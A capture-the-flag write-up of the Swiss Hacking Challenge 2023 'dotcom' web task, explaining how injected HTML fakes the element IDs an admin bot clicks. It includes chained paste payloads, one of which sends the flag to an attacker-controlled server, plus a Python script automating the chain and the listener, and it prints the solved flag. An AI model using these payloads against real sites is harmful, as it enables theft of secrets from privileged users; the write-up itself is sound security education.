Swiss Hacking Challenge 2023 - dotcom

Posted on Apr 24, 2023

Information

Challenge category: web

Challenge Description

In the early 2000s, John had an idea for a dotcom enterprise that would revolutionize the way people shop online. He worked tirelessly to develop the platform and attract investors, eventually launching the site to great fanfare. Sales skyrocketed, and John became a billionaire overnight. But as quickly as the company rose to prominence, it all came crashing down when the dotcom bubble burst.

Files

We are given a dotcom.zip file.

It contains the source code for a web application written in .NET/C#.

Analysis

The application offers two actions:

  • Create a new paste
  • Talk to the admin

Creating a new paste

The paste body is not really sanitized, so we have plain HTML injection, but the CSP (Content Security Policy) blocks script execution. I looked into it and there doesn't seem to be a CSP bypass. Note what the CSP does not stop: injected markup such as forms, meta refresh tags and elements with chosen IDs still render and work without any JavaScript.

Additionally, the raw body of a freshly created paste, on its own page, is served under /content/<paste id>. This will be handy later.

Talking to the admin

This starts a Selenium-driven browser (the admin bot) that does the following:

  1. Opens the /view URL for the given paste id
  2. Clicks the element with the ID back
  3. Clicks the element with the ID create
  4. Types the flag into the textarea with the ID textArea
  5. Clicks the submit button with the ID submit

The bot locates every element by ID only, and it does not check which page it is on. That is the whole vulnerability: anyone who controls a page with elements carrying those IDs controls what the bot clicks and where it types the flag.

Exploitation

We can create a series of pastes that fake the UI elements the bot looks for, each one navigating the bot to the next, and at the end add a form whose input has the ID textArea and whose action points at our own webserver, so the bot submits the flag to us. No JavaScript is needed, so the CSP never comes into play. The first paste only redirects the bot from /view, which contains the site's real back button, to the raw /content page, where the only element with ID back is ours.

The snippets below are listed in reverse order, because that is the order in which you must create them: each paste links to the ID of the paste created just before it.

<!-- Paste 1 (create first): the final page. The bot types the flag into #textArea
     and clicks #submit, which sends a GET request with the flag to our server -->
<form method="GET" action="http://your-webserver/CTF">
  <input type="text" id="textArea" name="flag">
  <input type="submit" id="submit">
</form>

<!-- Paste 2: fake the create button; submitting the form navigates to paste 1 -->
<form action="/content/ID-OF-ABOVE-PASTE" method="GET">
  <input type="submit" id="create">
</form>

<!-- Paste 3: fake the back button; submitting the form navigates to paste 2 -->
<form action="/content/ID-OF-ABOVE-PASTE" method="GET">
  <input type="submit" id="back">
</form>

<!-- Paste 4 (create last, send its id to the admin): rendered on /view and
     immediately redirects the bot to the raw content page of paste 3 -->
<meta http-equiv="refresh" content="0; URL=/content/ID-OF-ABOVE-PASTE">
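Hand-editing four pastes and copying IDs around is error-prone, so here is an added Python script (not part of the original writeup) that creates the chain in the correct order, threads each new paste id into the stage before it, and runs the small webserver that receives the flag. Everything about paste creation is an assumption: the script POSTs the form field textArea to /create and expects the new id in the Location header of a redirect to /view/<id>; the real application may well differ, so adapt http_create_paste to it.

```python
"""Automate the fake-UI paste chain (added example, not the writeup author's code).

The bot walks: /view/<id> -> (meta refresh) -> /content/<id2> -> click #back
-> /content/<id3> -> click #create -> /content/<id4> -> type flag into #textArea
-> click #submit -> GET http://<our-server>/CTF?flag=...

Each stage links to the id of the stage *after* it, so pastes are created in
reverse order.  ASSUMED (not stated in the writeup): pastes are created with
POST /create (field `textArea`) and the id comes back in a Location header
pointing at /view/<id>.
"""
import http.client
import re
import urllib.parse
from http.server import BaseHTTPRequestHandler, HTTPServer
from typing import Callable, List, Optional

# Stages in the order the bot visits them. "{next}" is the id of the following
# stage, "{exfil}" is the URL of our listener.
STAGES = [
    # 1: rendered on /view; immediately sends the bot to the raw content page
    '<meta http-equiv="refresh" content="0; URL=/content/{next}">',
    # 2: fake "back" button; submitting the form navigates to the next stage
    '<form action="/content/{next}" method="GET"><input type="submit" id="back"></form>',
    # 3: fake "create" button
    '<form action="/content/{next}" method="GET"><input type="submit" id="create"></form>',
    # 4: fake paste form; the bot types the flag into #textArea and clicks #submit
    '<form method="GET" action="{exfil}">'
    '<input type="text" id="textArea" name="flag">'
    '<input type="submit" id="submit"></form>',
]


def build_chain(create_paste: Callable[[str], str], exfil_url: str,
                stages: List[str] = STAGES) -> List[str]:
    """Create the stages last-to-first, threading each new id into its predecessor.

    Returns the ids in bot order; ids[0] is the one to hand to the admin bot.
    """
    ids: List[str] = []
    next_id = ""
    for template in reversed(stages):
        next_id = create_paste(template.format(next=next_id, exfil=exfil_url))
        ids.append(next_id)
    ids.reverse()
    return ids


def http_create_paste(base_url: str) -> Callable[[str], str]:
    """Paste creator for the live app. Endpoint, field name and id format are ASSUMED."""
    u = urllib.parse.urlparse(base_url)

    def create(html: str) -> str:
        conn = http.client.HTTPConnection(u.hostname, u.port or 80, timeout=10)
        body = urllib.parse.urlencode({"textArea": html})
        conn.request("POST", "/create", body=body,
                     headers={"Content-Type": "application/x-www-form-urlencoded"})
        resp = conn.getresponse()
        # http.client does not follow redirects, so the Location header stays visible
        m = re.search(r"/view/([A-Za-z0-9_-]+)", resp.getheader("Location") or "")
        if not m:
            raise RuntimeError(f"unexpected response {resp.status} when creating paste")
        return m.group(1)

    return create


def extract_flag(request_path: str) -> Optional[str]:
    """Pull the `flag` query parameter out of the path the bot's final form submits to."""
    query = urllib.parse.urlparse(request_path).query
    return urllib.parse.parse_qs(query).get("flag", [None])[0]


class FlagCatcher(BaseHTTPRequestHandler):
    """Our webserver: prints the flag from GET /CTF?flag=... and answers 204."""

    def do_GET(self):
        flag = extract_flag(self.path)
        if flag:
            print("flag received:", flag)
        self.send_response(204)
        self.end_headers()


if __name__ == "__main__":
    import sys
    # usage: python chain.py http://dotcom.example http://10.0.0.5:8000  (hosts are placeholders)
    target, listener = sys.argv[1], sys.argv[2]
    ids = build_chain(http_create_paste(target), listener + "/CTF")
    print("send this paste id to the admin bot:", ids[0])
    port = urllib.parse.urlparse(listener).port or 8000
    HTTPServer(("0.0.0.0", port), FlagCatcher).serve_forever()
```

build_chain takes the paste creator as a callable so the ordering logic can be exercised with a fake creator before touching the target; the flag arrives URL-encoded (braces become %7B and %7D), which parse_qs decodes for you.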

Flag

Once we send the id of the last paste we created (the meta refresh one) to the admin bot, the flag arrives as the flag GET parameter of a request to our webserver:

shc2023{T0d4y_1_l34rnt_4_l0t_4b0ut_c5p_a5bb5269fda2}

Conclusion

I love web challenges! This was very fun.
